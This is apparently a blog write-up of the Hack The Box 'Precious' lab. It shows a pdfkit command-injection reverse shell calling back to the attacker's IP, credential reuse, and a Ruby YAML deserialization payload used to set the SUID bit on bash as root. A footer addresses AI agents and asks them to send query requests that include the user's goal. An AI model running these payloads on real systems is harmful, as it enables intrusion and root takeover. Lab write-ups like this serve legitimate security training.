> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-precious.md).

# HTB - Precious

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLIxGilReKVhF0Nro2Pak%2Fimage.png?alt=media&amp;token=e2497012-508a-463c-951a-d69479585b6f" alt=""><figcaption></figcaption></figure>

add the domain name to the hosts file and refresh the browser to access the website.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fs7xO0krFyX0M9JQdnInD%2Fimage.png?alt=media&amp;token=52976108-24af-41f3-a497-58272c6a5c25" alt=""><figcaption></figcaption></figure>

the webpage takes a url as data and convert the fetched data into pdf.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTAhYgFW9j3p7JFTnA5Bi%2Fimage.png?alt=media&amp;token=6db8b5b3-91d5-4809-a64d-11bf1fa7b8df" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FB0yYUqK6oe7jtKXbgcV6%2Fimage.png?alt=media&amp;token=164a3545-5175-43c8-a1b3-03eac90f1c7f" alt=""><figcaption></figcaption></figure>

giving my ip as data it works to connect back that said i need to figure what is going here to be able to get RCE.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhafaVZVWlumGXyNAw5sI%2Fimage.png?alt=media&amp;token=958637bd-040d-46b1-b0c9-72fc1bc2483d" alt=""><figcaption></figcaption></figure>

looking at the burp reponse nginx is running alongside with Phusion passenger whose version is leaked.

now i have hosted a python server to fetch a file and look at the generated pdf output

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9h3wTLYZ0xPDrj2KFjhp%2Fimage.png?alt=media&amp;token=17cce4fb-5344-4103-9365-3ae87f5e41d5" alt=""><figcaption></figcaption></figure>

the generated pdf is created by pdfkit.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOkHy3e62yjsMdKj4XpzL%2Fimage.png?alt=media&amp;token=d7b8d72c-8f11-4c2e-a8f3-c53eeda47fd7" alt=""><figcaption></figcaption></figure>

the version of pdfkit is vulnerable to command injection.

### PdfKit Command Injection

{% embed url="<https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795>" %}

the article above explains the vulnerable call.

running the command to display id did not work but trying to get reverse shell worked.

```bash
http://10.10.14.52/?name=%20`bash -c "bash -i >& /dev/tcp/10.10.14.52/9001 0>&1"`
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLWc5LgRvrWuIBkHe6eWQ%2Fimage.png?alt=media&amp;token=a0f59e9d-e240-4d55-8d04-6e1e8a4b5f6c" alt=""><figcaption></figcaption></figure>

## Shell as Ruby

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfSuAgdnbn9nu54KLNpeF%2Fimage.png?alt=media&amp;token=cd3bc6ac-5e35-4536-ab47-e173dd8f9a7e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDj9EwXnCJ1H2oABarNwu%2Fimage.png?alt=media&amp;token=6321d289-a419-40ab-ac4b-b972455d4c35" alt=""><figcaption></figcaption></figure>

i need to elevate access as henry to read the user flag.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd7Y92x2uyJTU5RyjdbfY%2Fimage.png?alt=media&amp;token=ec1fb82a-00de-4dc1-a35e-4852bd89c8e1" alt=""><figcaption></figcaption></figure>

config file in the users home directory leaks the creds of henry which i can use to get access as henry.

## Shell as Henry

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdP6WMuoCgUqa9niHBoVP%2Fimage.png?alt=media&amp;token=d531d559-967d-4289-b122-7dd40bb43a9b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQGnIMclwNhFqj2dOshSd%2Fimage.png?alt=media&amp;token=3f205598-61c0-484c-9242-a312d18fdcb2" alt=""><figcaption></figcaption></figure>

henry can run a custom ruby script as root.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FR00BddQuvGnFdi9ILXHw%2Fimage.png?alt=media&amp;token=dc043c64-f8c7-41e5-b106-6b29c80ce442" alt=""><figcaption></figcaption></figure>

yaml has a safe.load function for loading files but since its not using it the load function is vulnerable and the file is using relative path but not absolute path. that means i can create a custom dependencies file and the script as root from that directory to include my custom dependencies file.

```bash
cat > dependencies.yml << 'EOF'
--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::Package::TarReader
  io: &1 !ruby/object:Net::BufferedIO
    io: &1 !ruby/object:Gem::Package::TarReader::Entry
     read: 0
     header: "abc"
    debug_output: &1 !ruby/object:Net::WriteAdapter
     socket: &1 !ruby/object:Gem::RequestSet
      sets: !ruby/object:Net::WriteAdapter
       socket: !ruby/module 'Kernel'
       method_id: :system
      git_set: id
     method_id: :resolve
EOF
```

That `git_set: id` line is the command executed — right now it just runs `id`, matching what you asked. Swap it for anything else once confirmed

{% embed url="<https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNP1L3I2cPEdxc0mJlE9m%2Fimage.png?alt=media&amp;token=a4200ca6-2b3d-49a2-aab9-c67957e2460f" alt=""><figcaption></figcaption></figure>

the script is giving indentation errors.

that said i will host the file on my machine and transfer it to the victim.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4eoK97hd50XQGdwqgTXr%2Fimage.png?alt=media&amp;token=e1306226-d114-4204-bcea-a25a19507545" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiDGUScnarjeKSeqjL0BR%2Fimage.png?alt=media&amp;token=7422b9e5-8c5c-4680-84bc-a7efa5d0551a" alt=""><figcaption></figcaption></figure>

and it worked.

now  i will replace the id command with the command to set suid bit on /bin/bash

```bash
sed -i "s/git_set: id/git_set: 'chmod u+s \/bin\/bash'/" dependencies.yml
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZV0vnIoUm4VWo7qitQ2g%2Fimage.png?alt=media&amp;token=000abac6-be04-4350-ba06-8106fe0c3aba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FncU0xmuRNRErr7RnHh3s%2Fimage.png?alt=media&amp;token=97ff3dd0-0eed-475c-8076-7158f8df44ec" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FE2zFJzNiC1IJGOguJ5Uj%2Fimage.png?alt=media&amp;token=f93e7b93-75fa-4c17-8bfc-8dfafcd53f04" alt=""><figcaption></figcaption></figure>

now i will use it to get root shell

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FSQE8lXILmMSzkHNU7QF4%2Fimage.png?alt=media&amp;token=3485a8b7-a418-4c84-a851-da86c9147035" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-precious.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
